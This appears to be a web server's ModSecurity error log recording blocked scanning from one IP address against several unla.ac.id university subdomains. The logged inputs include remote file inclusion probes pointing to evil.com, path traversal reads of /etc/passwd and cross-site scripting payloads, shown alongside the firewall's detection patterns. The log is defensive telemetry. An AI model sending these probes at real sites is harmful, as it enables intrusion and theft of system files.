[Tue Aug 29 11:55:31.598271 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAApHRhcAAAAP"]
[Tue Aug 29 11:55:31.615489 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAAqqtg4AAAAA"]
[Tue Aug 29 11:55:31.635896 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAApXgroAAAAU"]
[Tue Aug 29 11:55:31.829163 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16Q8Co-f0AAAqTvtAAAAAa"]
[Tue Aug 29 11:55:31.884279 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16Q8Co-f0AAAqTvtEAAAAa"]
[Tue Aug 29 11:55:32.614747 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAApXgsEAAAAU"]
[Tue Aug 29 11:55:32.616789 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAAqTvtUAAAAa"]
[Tue Aug 29 11:55:32.661757 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAAolKrEAAAAe"]
[Tue Aug 29 11:55:32.669390 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAApbUjMAAAAh"]
[Tue Aug 29 11:55:32.704906 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAAolKrMAAAAe"]
[Tue Aug 29 11:55:33.729714 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RcCo-f0AAAolKrwAAAAe"]
[Tue Aug 29 11:55:33.737221 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16RcCo-f0AAAoz8HUAAAAS"]
[Tue Aug 29 11:55:33.904402 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RcCo-f0AAAqY6GIAAAAr"]
[Tue Aug 29 11:55:34.008559 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RsCo-f0AAAq2KcgAAAAE"]
[Tue Aug 29 11:55:34.056412 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RsCo-f0AAAqY6GMAAAAr"]
[Tue Aug 29 11:55:34.110315 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RsCo-f0AAAolKsAAAAAe"]
[Tue Aug 29 11:55:34.146295 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RsCo-f0AAApbUj4AAAAh"]
[Tue Aug 29 11:55:34.632955 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RsCo-f0AAAolKsQAAAAe"]
[Tue Aug 29 11:55:34.829939 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16RsCo-f0AAAoz8H0AAAAS"]
[Tue Aug 29 11:55:35.776330 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16R8Co-f0AAApHRjAAAAAP"]
[Tue Aug 29 11:55:35.831851 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:key: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16R8Co-f0AAApbUkQAAAAh"]
[Tue Aug 29 11:55:36.115715 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:key: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16SMCo-f0AAAq4fUkAAAAJ"]
[Tue Aug 29 11:55:36.127675 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq3a5EAAAAI"]
[Tue Aug 29 11:55:36.130277 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:key: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16SMCo-f0AAApbUkkAAAAh"]
[Tue Aug 29 11:55:36.203095 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:key: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16SMCo-f0AAAq3a5MAAAAI"]
[Tue Aug 29 11:55:36.220506 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAqTvuUAAAAa"]
[Tue Aug 29 11:55:36.241159 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq4fUwAAAAJ"]
[Tue Aug 29 11:55:36.242972 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:key: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16SMCo-f0AAAqTvuYAAAAa"]
[Tue Aug 29 11:55:36.539119 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAqTvugAAAAa"]
[Tue Aug 29 11:55:36.555554 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq2Kd4AAAAE"]
[Tue Aug 29 11:55:36.555591 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq4fU8AAAAJ"]
[Tue Aug 29 11:55:36.578382 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq2Kd8AAAAE"]
